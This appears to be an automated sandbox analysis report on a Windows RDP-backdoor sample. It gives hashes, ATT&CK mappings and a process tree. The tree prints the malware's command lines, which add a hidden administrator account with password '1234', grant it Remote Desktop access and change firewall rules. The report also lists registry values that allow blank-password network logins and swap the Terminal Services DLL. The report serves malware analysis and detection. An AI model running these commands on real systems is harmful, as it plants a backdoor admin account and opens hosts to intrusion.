Analysis
- max time kernel: 135s
- max time network: 129s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-08-2024 06:25
Tasks (task id: sample, resource)
- static1: static task
- behavioral1: a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe, win7-20240704-en
- behavioral2: a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe, win10v2004-20240802-en
- behavioral3: $PLUGINSDIR/NSISList.dll, win7-20240705-en
- behavioral4: $PLUGINSDIR/NSISList.dll, win10v2004-20240802-en
- behavioral5: $PLUGINSDIR/System.dll, win7-20240704-en
- behavioral6: $PLUGINSDIR/System.dll, win10v2004-20240802-en
- behavioral7: $PLUGINSDIR/nsExec.dll, win7-20240704-en
- behavioral8: $PLUGINSDIR/nsExec.dll, win10v2004-20240802-en
- behavioral9: $PLUGINSDIR/nsProcess.dll, win7-20240705-en
- behavioral10: $PLUGINSDIR/nsProcess.dll, win10v2004-20240802-en
- behavioral11: $PLUGINSDIR/registry.dll, win7-20240708-en
- behavioral12: $PLUGINSDIR/registry.dll, win10v2004-20240802-en
- behavioral13: $TEMP/RDP_5166.exe, win7-20240708-en
- behavioral14: $TEMP/RDP_5166.exe, win10v2004-20240802-en
- behavioral15: $PLUGINSDIR/System.dll, win7-20240705-en
- behavioral16: $PLUGINSDIR/System.dll, win10v2004-20240802-en
- behavioral17: $PLUGINSDIR/nsExec.dll, win7-20240704-en
- behavioral18: $PLUGINSDIR/nsExec.dll, win10v2004-20240802-en
- behavioral19: $TEMP/SETUP_73538.exe, win7-20240704-en
- behavioral20: $TEMP/SETUP_73538.exe, win10v2004-20240802-en
- behavioral21: $_1_/abashed.exe, win7-20240705-en
- behavioral22: $_1_/abashed.exe, win10v2004-20240802-en
- behavioral23: $_1_/libeay32.dll, win7-20240704-en
- behavioral24: $_1_/libeay32.dll, win10v2004-20240802-en
- behavioral25: $_1_/ssleay32.dll, win7-20240704-en
- behavioral26: $_1_/ssleay32.dll, win10v2004-20240802-en
General
- Target: $TEMP/RDP_5166.exe
- Size: 569KB
- MD5: a46ab91afbba2a657bce8e961bf2632f
- SHA1: 7c1a484a381fc4915c6904358f7a3611ad9323d2
- SHA256: 740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1
- SHA512: a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4
- SSDEEP: 12288:8W7IR23s4x7/6GDG9e9WJX08vV0CjUsZl4VXqnxq:h7J5D6GDGc9WJk8d0wLIaq
Malware Config
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Remote Service Session Hijacking: RDP Hijacking (1 TTP, 3 IoCs)
  Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  | pid | Process |
  |---|---|
  | 2684 | cmd.exe |
  | 5020 | net1.exe |
  | 2680 | net.exe |
- Modifies Windows Firewall (2 TTPs, 3 IoCs)

  | pid | Process |
  |---|---|
  | 3312 | netsh.exe |
  | 4356 | netsh.exe |
  | 1688 | netsh.exe |
- Server Software Component: Terminal Services DLL (1 TTP, 1 IoC)

  | description | ioc | Process |
  |---|---|---|
  | Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Icosahedron\\disavow.dll" | SETUP_73538.exe |
- Allows Network login with blank passwords (1 TTP, 1 IoC)
  Allows local user accounts with blank passwords to access the device from the network.

  | description | ioc | Process |
  |---|---|---|
  | Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" | RDP_5166.exe |
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.

  | description | ioc | Process |
  |---|---|---|
  | Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | RDP_5166.exe |
- Executes dropped EXE (1 IoC)

  | pid | Process |
  |---|---|
  | 2824 | SETUP_73538.exe |
- Loads dropped DLL (6 IoCs)

  | pid | Process | occurrences |
  |---|---|---|
  | 4556 | RDP_5166.exe | 5 |
  | 1036 | svchost.exe | 1 |
- Modifies WinLogon (2 TTPs, 4 IoCs)

  | description | ioc | Process |
  |---|---|---|
  | Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | RDP_5166.exe |
  | Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | RDP_5166.exe |
  | Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" | RDP_5166.exe |
  | Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | SETUP_73538.exe |
- Drops file in System32 directory (1 IoC)

  | description | ioc | Process |
  |---|---|---|
  | File created | C:\Windows\System32\rfxvmt.dll | SETUP_73538.exe |
- Hide Artifacts: Hidden Users (1 TTP, 1 IoC)

  | description | ioc | Process |
  |---|---|---|
  | Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" | RDP_5166.exe |
- Drops file in Program Files directory (2 IoCs)

  | description | ioc | Process |
  |---|---|---|
  | File created | C:\Program Files\Icosahedron\disavow.ini | SETUP_73538.exe |
  | File created | C:\Program Files\Icosahedron\disavow.dll | SETUP_73538.exe |
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTP, 9 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  | description | ioc | Process |
  |---|---|---|
  | Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe |
  | Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe |
  | Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe |
  | Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe |
  | Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe |
  | Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe |
  | Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe |
  | Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe |
  | Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe |
- Permission Groups Discovery: Local Groups (1 TTP)
  Attempt to find local system groups and permission settings.
- System Location Discovery: System Language Discovery (1 TTP, 14 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  | description | ioc | Process | occurrences |
  |---|---|---|---|
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe | 4 |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe | 3 |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe | 3 |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | netsh.exe | 2 |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RDP_5166.exe | 1 |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | SETUP_73538.exe | 1 |
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)

  | pid | Process | occurrences |
  |---|---|---|
  | 1036 | svchost.exe | 4 |
- Suspicious behavior: LoadsDriver (1 IoC)

  | pid | Process |
  |---|---|
  | 652 | Process not Found |
- Suspicious use of AdjustPrivilegeToken (2 IoCs)

  | description | pid | Process |
  |---|---|---|
  | Token: SeDebugPrivilege | 2824 | SETUP_73538.exe |
  | Token: SeAuditPrivilege | 1036 | svchost.exe |
- Suspicious use of WriteProcessMemory (41 IoCs)

  | description | pid | Process | procid_target | occurrences |
  |---|---|---|---|---|
  | PID 4556 wrote to memory of 2824 | 4556 | RDP_5166.exe | 93 | 3 |
  | PID 4556 wrote to memory of 4576 | 4556 | RDP_5166.exe | 95 | 3 |
  | PID 4576 wrote to memory of 4356 | 4576 | cmd.exe | 97 | 3 |
  | PID 4556 wrote to memory of 1636 | 4556 | RDP_5166.exe | 100 | 3 |
  | PID 1636 wrote to memory of 1688 | 1636 | cmd.exe | 102 | 3 |
  | PID 4556 wrote to memory of 4640 | 4556 | RDP_5166.exe | 103 | 3 |
  | PID 4640 wrote to memory of 3288 | 4640 | cmd.exe | 105 | 3 |
  | PID 3288 wrote to memory of 2788 | 3288 | net.exe | 106 | 3 |
  | PID 4556 wrote to memory of 2684 | 4556 | RDP_5166.exe | 107 | 3 |
  | PID 2684 wrote to memory of 888 | 2684 | cmd.exe | 109 | 3 |
  | PID 888 wrote to memory of 2556 | 888 | net.exe | 110 | 3 |
  | PID 2684 wrote to memory of 2680 | 2684 | cmd.exe | 111 | 3 |
  | PID 2680 wrote to memory of 5020 | 2680 | net.exe | 112 | 3 |
  | PID 2824 wrote to memory of 3312 | 2824 | SETUP_73538.exe | 114 | 2 |
Processes (process tree; indentation shows parent/child relationships)
- C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe (PID 4556)
  Command line: "C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"
  Signatures: Allows Network login with blank passwords; Checks computer location settings; Loads dropped DLL; Modifies WinLogon; Hide Artifacts: Hidden Users; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe (PID 2824)
    Command line: "C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i
    Signatures: Server Software Component: Terminal Services DLL; Executes dropped EXE; Modifies WinLogon; Drops file in System32 directory; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SYSTEM32\netsh.exe (PID 3312)
      Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
  - C:\Windows\SysWOW64\cmd.exe (PID 4576)
    Command line: "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\netsh.exe (PID 4356)
      Command line: netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 1636)
    Command line: "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\netsh.exe (PID 1688)
      Command line: netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 4640)
    Command line: "C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 3288)
      Command line: net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 2788)
        Command line: C:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
        Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 2684)
    Command line: "C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add
    Signatures: Remote Service Session Hijacking: RDP Hijacking; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 888)
      Command line: net localgroup "Administrators" "wgautilacc" /add
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 2556)
        Command line: C:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add
        Signatures: System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\net.exe (PID 2680)
      Command line: net localgroup "Remote Desktop Users" "wgautilacc" /add
      Signatures: Remote Service Session Hijacking: RDP Hijacking; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 5020)
        Command line: C:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add
        Signatures: Remote Service Session Hijacking: RDP Hijacking; System Location Discovery: System Language Discovery
- C:\Windows\System32\svchost.exe (PID 1516)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
- C:\Windows\System32\svchost.exe (PID 1036)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
  Signatures: Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4312)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1292,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8
Network
MITRE ATT&CK Enterprise v15 (tactic: technique (count), sub-technique (count))
- Persistence
  - Account Manipulation (1)
  - Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  - Create or Modify System Process (1): Windows Service (1)
  - Event Triggered Execution (1): Netsh Helper DLL (1)
  - Server Software Component (1): Terminal Services DLL (1)
- Privilege Escalation
  - Account Manipulation (1)
  - Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  - Create or Modify System Process (1): Windows Service (1)
  - Event Triggered Execution (1): Netsh Helper DLL (1)
- Defense Evasion
  - Hide Artifacts (1): Hidden Users (1)
  - Impair Defenses (1): Disable or Modify System Firewall (1)
  - Modify Registry (1)
- Discovery
  - Permission Groups Discovery (1): Local Groups (1)
  - Query Registry (1)
  - System Information Discovery (2)
  - System Location Discovery (1): System Language Discovery (1)
Downloads